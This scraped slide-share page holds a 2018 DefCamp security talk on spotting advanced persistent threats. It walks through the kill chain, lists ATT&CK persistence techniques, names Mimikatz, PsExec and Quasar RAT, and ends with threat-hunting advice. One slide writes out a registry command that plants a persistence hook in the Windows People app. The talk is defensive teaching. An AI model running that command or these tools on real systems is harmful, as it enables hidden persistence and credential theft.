DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

Catch Me If You Can - Finding APTs in your network

  • 1. Classification: //Secureworks/Public Use:© SecureWorks, Inc. DefCamp Adrian Tudor Leo Neagu November 2018 1 Catch Me If You Can – Finding APTs in your network
  • 2. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 2 • An Advanced Persistent Threat (APT) is a cyberattack that will “fly under the radar” and your AV/IDS will not let you know about it What is an APT?
  • 3. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 3 • targeted cyberattack in which an intruder gains access to a network • remains undetected for an extended period of time • traditionally has been associated with nation-state players • in the last few years, the tools and techniques used by a few APT actors have also been adopted by various cybercriminals groups. What is an APT? Key elements of an APT attack - targeted SCADA systems and is believed to be responsible for causing substantial damage to Iran's nuclear program (2010)
  • 4. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 4 • Focus on • Delivery • Exploitation • Installation • Command and Control • Action and Objectives APT attack mechanism
  • 5. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 5 APT attack mechanism
  • 6. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 6 • Vector of compromise APT attack mechanism - Delivery
  • 7. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 7 Exploitation with malicious links APT Exploitation and Installation
  • 8. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 8 APT Exploitation and Installation
  • 9. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 9 Quasar RAT – Easy to use/deploy NetWire malware APT Exploitation and Installation
  • 10. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 10 Quasar RAT – Easy to use/deploy - Demo APT Exploitation and Installation
  • 11. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 11 APT Installation
  • 12. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 12 - Creating services that sound legit - Task schedule - Malware installed as Microsoft Office Add-in. When MS Word starts, malware executed - DLL hijacking - and many more APT Installation – Persistence
  • 13. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 13 - .bash_profile and .bashrc - Accessibility Features - Account Manipulation - AppCert DLLs - AppInit DLLs - Application Shimming - Authentication Package - BITS Jobs - Bootkit - Browser Extensions - Change Default File Association - Component Firmware - Component Object Model Hijacking - Create Account - DLL Search Order Hijacking - Dylib Hijacking - External Remote Services - File System Permissions Weakness - Hidden Files and Directories - Hooking - Hypervisor - Image File Execution Options Injection - Kernel Modules and Extensions - Launch Agent - Launch Daemon - Launchctl - LC_LOAD_DYLIB Addition - Local Job Scheduling - Login Item - Logon Scripts - LSASS Driver - Modify Existing Service - Netsh Helper DLL - New Service - Office Application Startup - Path Interception - Plist Modification - Port Knocking - Port Monitors - Rc.common - Re-opened Applications - Redundant Access - Registry Run Keys / Startup Folder - Scheduled Task - Screensaver - Security Support Provider - Service Registry Permissions Weakness - Setuid and Setgid - Shortcut Modification - SIP and Trust Provider Hijacking - Startup Items - System Firmware - Time Providers - Trap - Valid Accounts - Web Shell - Windows Management Instrumentation Event Subscription - Winlogon Helper DLL APT Installation – Persistence You can find more detailed information on https://attack.mitre.org
  • 14. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 14 • PERSISTENCE USING UNIVERSAL WINDOWS PLATFORM APPS (APPX) APT Installation – Persistence
  • 15. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 15 PERSISTENCE USING UNIVERSAL WINDOWS PLATFORM APPS (APPX) APT Installation – Persistence reg add HKCUSoftwareClassesActivatableClassesPackageMicrosoft.People_10.1807.2131. 0_x64__8wekyb3d8bbweDebugInformationx4c7a3b7dy2188y46d4ya362y19ac5a580 5e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:UsersIEUserAppDataRoamingSubDirClient.exe" Reference: ODDVAR MOE : https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/ Persistence using the People app
  • 16. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 16 Moving laterally inside the environment, compromising additional targets and getting closer to high value assets using different tools and techniques: - Enumerate password data from memory using commonly available password dumpers (Mimikatz) - Net.exe to connect to network shares using net use commands with compromised credentials - Spread through the local network by using PsExec - Windows Management Instrumentation (WMI) to interact with local and remote systems APT Lateral movement
  • 17. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 17 - Recognizing an APT attack early in the kill chain is a tough job - The attackers prefer to work slow blending with regular network activity and using tools already available in the environment (PowerShell, WMI, net.exe etc.) How can I tell I’m targeted?
  • 18. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 18 - Large outbound network traffic should raise questions, especially if the amount transferred is out of the regular trendline - Quite often APT attacks are detected when the data gathered already has been exfiltrated, sometimes even months later Data exfiltration: to late to detect?
  • 19. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 19 The reason behind the spike - A web shell present on a IIS server (China Chopper) - A password encrypted RAR archive was exfiltrated - Further analysis of the RAM memory revealed the preparation of the data being exfiltrated
  • 20. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 20 Are you ready to detect an APT? Assess your current state • Identify your assets • Know your vulnerabilities Know your enemies • Threat Intelligence feeds • Tools, tactics and procedures used by threat actors Design and implement your vision • Multi-layered endpoint & network protection • Threat Hunting
  • 21. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 21 Let’s go Threat Hunting – look for hidden threats Start the hunt Refine the hunt Response Large unexpected data flows Remote access via RDP Scheduled tasks Phishing campaigns Encoded PowerShell commands Net.exe use
  • 22. Classification: //Secureworks/Public Use:© SecureWorks, Inc. 22 QUESTIONS? THANK YOU!